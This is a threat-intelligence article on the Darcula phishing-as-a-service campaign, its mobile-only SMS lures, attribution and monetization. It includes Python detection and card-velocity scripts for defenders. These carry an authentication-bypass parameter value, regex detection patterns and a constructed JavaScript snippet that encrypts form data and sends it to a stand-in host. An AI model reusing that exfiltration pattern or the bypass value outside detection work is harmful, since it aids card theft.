
The Darcula PhaaS (Phishing-as-a-Service) platform has emerged as one of the most sophisticated cybercrime operations of 2025, stealing 884,000 credit card details through 13 million fraudulent clicks across 100+ countries. First detected in December 2023, this mobile-first campaign impersonated trusted brands such as DHL and PayPal, using SMS phishing (smishing) to bypass traditional email filters. The operation caused estimated damages exceeding $150 million, with stolen cards sold for $20–$100 each on dark web markets [1].
Operational Mechanics
The Darcula group employed a multi-layered infrastructure, registering 20,000 domains to spoof 300+ brands. Unlike conventional phishing kits, their “Magic Cat” toolkit incorporated client-side encryption using Socket.IO with the Rabbit algorithm and Base64/MD5 hashing [2]. The operation specifically targeted mobile users by blocking desktop traffic: even a request whose User-Agent header claimed iPhone OS 17_7_2 would receive a 404 error unless it originated from a cellular network [3].
Key technical components included:
- Real-time victim dashboards streaming data to Telegram groups via encrypted Socket.IO rooms
- JavaScript-based Crypto-JS library for client-side data encryption
- GenAI integration since April 2025 to auto-generate multilingual phishing pages
Attribution and Monetization
Investigators linked the primary developer to Yucheng C., a 24-year-old from Henan, China, through GitHub commits and Alibaba Cloud VM logs [4]. The PhaaS model was leased for $300–$500 per week, complete with brand templates and SMS gateway integration for 2FA bypass. A network of 600+ operators managed SIM farms and payment terminals, with some members flaunting luxury purchases via Telegram channels [5].
Detection and Mitigation
Security teams identified several indicators of compromise (IoCs):
| Indicator | Description |
|---|---|
| HTTP parameter | `secret=824d02e7cf6ec64a44710b06ef8cfa0e` (authentication bypass) |
| Encryption pattern | Rabbit algorithm with Base64/MD5 hashing in JavaScript |
| Network behavior | Socket.IO traffic to Telegram-administered rooms |
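The indicators in the table, together with the mobile-only gating and the Crypto-JS pattern described under Operational Mechanics, can be turned into a small triage script. The following is an added example written for this article, not code from the report or from any of the cited vendors: it scans a constructed tab-separated web log for the `secret` parameter value quoted above, for Socket.IO endpoints, and for the pattern of one path serving 200 to a mobile User-Agent while returning 404 to desktop browsers, and it checks fetched JavaScript for the Rabbit plus Base64/MD5 combination. The log format, the hostnames (`.example.invalid`), the sample script and the regular expressions are all my own constructions that approximate the behaviour the article describes.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Indicator value taken from the article's IoC table.
DARCULA_SECRET = "824d02e7cf6ec64a44710b06ef8cfa0e"

# Crypto-JS identifiers approximating the Rabbit + Base64/MD5 pattern the article
# attributes to Magic Cat. The regexes are my own, not signatures from the report.
SCRIPT_PATTERNS = {
    "cryptojs_rabbit": re.compile(r"CryptoJS\.Rabbit\.(encrypt|decrypt)"),
    "cryptojs_md5": re.compile(r"CryptoJS\.MD5\("),
    "cryptojs_base64": re.compile(r"CryptoJS\.enc\.Base64"),
    "socketio_client": re.compile(r"\bio\(\s*['\"]"),
}

# Rough mobile User-Agent matcher (iPhone OS x_y or Android).
MOBILE_UA = re.compile(r"iPhone OS \d+_\d+|Android", re.I)


def scan_script(js_text):
    """Return (matched pattern names, suspicious flag) for a JavaScript blob.

    The combination the article describes is Rabbit together with MD5 or Base64,
    so only that combination raises the flag; a lone MD5 call is ordinary."""
    hits = {name for rx_name, rx in SCRIPT_PATTERNS.items() if rx.search(js_text) for name in [rx_name]}
    suspicious = "cryptojs_rabbit" in hits and bool(hits & {"cryptojs_md5", "cryptojs_base64"})
    return hits, suspicious


def parse_log_line(line):
    """Constructed log format: ts<TAB>client<TAB>method<TAB>url<TAB>status<TAB>user_agent."""
    ts, client, method, url, status, ua = line.rstrip("\n").split("\t")
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "ua": ua}


def scan_log(lines):
    """Return a list of (finding, subject, detail) tuples over the log lines."""
    findings = []
    by_path = defaultdict(list)
    for line in lines:
        rec = parse_log_line(line)
        parts = urlsplit(rec["url"])
        query = parse_qs(parts.query)
        if DARCULA_SECRET in query.get("secret", []):
            findings.append(("darcula_secret_param", rec["client"], rec["url"]))
        if parts.path.startswith("/socket.io/"):
            findings.append(("socketio_traffic", rec["client"], parts.netloc))
        by_path[(parts.netloc, parts.path)].append(rec)
    # Mobile-only gating: the same path answers 200 to a mobile UA but 404 to desktop.
    for (host, path), recs in by_path.items():
        mobile_ok = any(r["status"] == 200 and MOBILE_UA.search(r["ua"]) for r in recs)
        desktop_404 = any(r["status"] == 404 and not MOBILE_UA.search(r["ua"]) for r in recs)
        if mobile_ok and desktop_404:
            findings.append(("mobile_only_gating", host, path))
    return findings


# Constructed sample data (not captured traffic); hostnames use the .invalid TLD.
IPHONE_UA = "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7_2 like Mac OS X)"
DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
SAMPLE_LOG = [
    "2025-05-01T10:00:00Z\t10.0.0.5\tGET\thttp://dhl-delivery.example.invalid/?secret="
    + DARCULA_SECRET + "\t200\t" + IPHONE_UA,
    "2025-05-01T10:00:01Z\t10.0.0.5\tGET\thttp://dhl-delivery.example.invalid/socket.io/?EIO=4&transport=polling\t200\t" + IPHONE_UA,
    "2025-05-01T10:05:00Z\t10.0.0.9\tGET\thttp://dhl-delivery.example.invalid/\t404\t" + DESKTOP_UA,
    "2025-05-01T10:06:00Z\t10.0.0.7\tGET\thttp://intranet.example.invalid/home\t200\t" + DESKTOP_UA,
]

# Constructed snippet that mimics the crypto pattern only; it is not a working kit.
SAMPLE_SCRIPT = """
var socket = io("https://example.invalid");
var key = CryptoJS.MD5(navigator.userAgent).toString();
var payload = CryptoJS.Rabbit.encrypt(JSON.stringify(form), key).toString();
socket.emit("data", CryptoJS.enc.Base64.stringify(CryptoJS.enc.Utf8.parse(payload)));
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(scan_script(SAMPLE_SCRIPT))
```

The gating check needs both a mobile and a desktop request to the same path, so it only fires once a defender has deliberately fetched the suspect URL with both User-Agents (or has enough organic traffic); the `secret` parameter and the Socket.IO path are checked per line.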
Recommended countermeasures include deploying AI-driven SMS filtering (Netcraft’s platform has shown 92% detection efficacy) and implementing transaction velocity monitoring for card-not-present transactions [6].
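Transaction velocity monitoring, as recommended above, is the control on the issuer and merchant side that catches stolen card data being exercised. The following is an added illustration, not code from the article or from Netcraft: a sliding-window rule that counts card-not-present (CNP) authorisations per card token and raises an alert when a card exceeds a configurable number of attempts within the window, reporting how many distinct merchants were involved. The transaction records, card tokens and merchant names are constructed, and the threshold and window are assumed defaults, not values from the article.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


class CnpVelocityMonitor:
    """Sliding-window count of card-not-present authorisations per card token."""

    def __init__(self, max_attempts=5, window=timedelta(minutes=10)):
        self.max_attempts = max_attempts          # assumed default, tune per portfolio
        self.window = window
        self.history = defaultdict(deque)         # card_token -> deque of (ts, merchant)

    def observe(self, txn):
        """Record one transaction; return an alert dict when velocity is exceeded."""
        if txn["channel"] != "CNP":
            return None                           # card-present traffic is out of scope here
        # Accept ISO 8601 with a trailing Z on older Python versions too.
        ts = datetime.fromisoformat(txn["ts"].replace("Z", "+00:00"))
        q = self.history[txn["card_token"]]
        q.append((ts, txn["merchant"]))
        # Drop attempts that have aged out of the window (input is assumed time-ordered).
        while q and ts - q[0][0] > self.window:
            q.popleft()
        if len(q) > self.max_attempts:
            return {
                "card_token": txn["card_token"],
                "ts": txn["ts"],
                "attempts": len(q),
                "distinct_merchants": len({m for _, m in q}),
            }
        return None


def run_monitor(transactions, **kwargs):
    """Feed a time-ordered list of transactions through a fresh monitor; return alerts."""
    mon = CnpVelocityMonitor(**kwargs)
    return [alert for alert in map(mon.observe, transactions) if alert]


def _txn(ts, token, merchant, channel="CNP", amount=9.99):
    return {"ts": ts, "card_token": token, "merchant": merchant,
            "channel": channel, "amount": amount}


# Constructed sample: one token is tested across seven merchants in three minutes,
# with one stale attempt an hour earlier that must not count; a second token is normal.
SAMPLE_TRANSACTIONS = [
    _txn("2025-05-01T09:00:00Z", "tok_constructed_1", "merchant_old"),
    _txn("2025-05-01T09:30:00Z", "tok_constructed_1", "store_front", channel="CP"),
    _txn("2025-05-01T10:00:00Z", "tok_constructed_1", "m1"),
    _txn("2025-05-01T10:00:30Z", "tok_constructed_1", "m2"),
    _txn("2025-05-01T10:01:00Z", "tok_constructed_2", "m1"),
    _txn("2025-05-01T10:01:00Z", "tok_constructed_1", "m3"),
    _txn("2025-05-01T10:01:30Z", "tok_constructed_1", "m4"),
    _txn("2025-05-01T10:02:00Z", "tok_constructed_1", "m5"),
    _txn("2025-05-01T10:02:30Z", "tok_constructed_1", "m6"),
    _txn("2025-05-01T10:03:00Z", "tok_constructed_1", "m7"),
    _txn("2025-05-01T10:04:00Z", "tok_constructed_2", "m2"),
]

if __name__ == "__main__":
    for alert in run_monitor(SAMPLE_TRANSACTIONS):
        print(alert)
```

With the defaults, the first alert fires on the sixth in-window CNP attempt for `tok_constructed_1` (the 09:00 attempt has aged out and the card-present purchase is ignored), and a second fires on the seventh; `tok_constructed_2`, with two attempts, never alerts. The distinct-merchant count is what separates card testing across many small merchants from a customer retrying a single checkout.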
Conclusion
The Darcula operation demonstrates the increasing professionalization of cybercrime, with PhaaS platforms lowering the barrier to entry for technically unskilled attackers. While law enforcement has taken down 25,000 domains, the group’s rapid infrastructure redeployment capability poses ongoing challenges. Organizations should prioritize mobile-specific phishing awareness training and consider implementing SIM farm detection heuristics in their fraud prevention systems.
References
1. “Darcula PhaaS steals 884,000 credit cards via phishing texts,” BleepingComputer, May 2025.
2. “Exposing Darcula: Technical analysis of Magic Cat,” Mnemonic, 2024.
3. “AI-enabled Darcula phishing,” Netcraft, April 2025.
4. “Svindelsentralen documentary,” NRK, 2025.
5. Mnemonic deobfuscated code analysis, 2024.
6. Netcraft phishing detection metrics, Q1 2025.